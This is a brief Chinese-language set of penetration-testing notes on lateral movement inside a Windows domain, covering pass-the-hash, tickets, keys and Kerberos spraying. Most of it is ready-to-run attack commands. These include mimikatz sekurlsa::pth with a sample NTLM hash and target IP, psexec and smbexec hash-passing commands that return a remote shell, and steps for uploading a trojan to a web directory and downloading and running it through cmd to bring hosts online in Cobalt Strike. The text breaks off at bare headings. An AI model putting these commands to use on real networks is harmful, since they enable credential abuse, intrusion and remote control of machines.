内网安全-横向移动PTH 哈希PTT 票据PTK 密匙Kerberos密码喷射
一.域横向pth,mimkatz,NTLM
windwos server 2012 R2之前可能是NTLM和LM,之后为NTLM
1.mimkatz ptk
使用mimkatz进行横向移动
mimikatz sekurlsa::pth /user:administrator(目标本地用户名) /domain:192.168.3.32(目标ip) /ntlm:518b98ad4178a53695dc997aa02d455c(目标hash)
在执行命令机器弹出cmd窗口
使用该命令进行传递木马
创建bshell:
执行:
在内网攻击机器进行hash传递
cs上配置socket节点
配置代理
使用psexec进行hash传递返回被控机器shell终端:
.\psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
上线cs:
1.上传木马到web目录
2.使用cmd下载木马并且执行
使用smbexec进行传递
.\smbexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
2.pth-漏洞&kekeo&Ticks
1.ms14068
2.kekeo(高权限,需要NTGM)
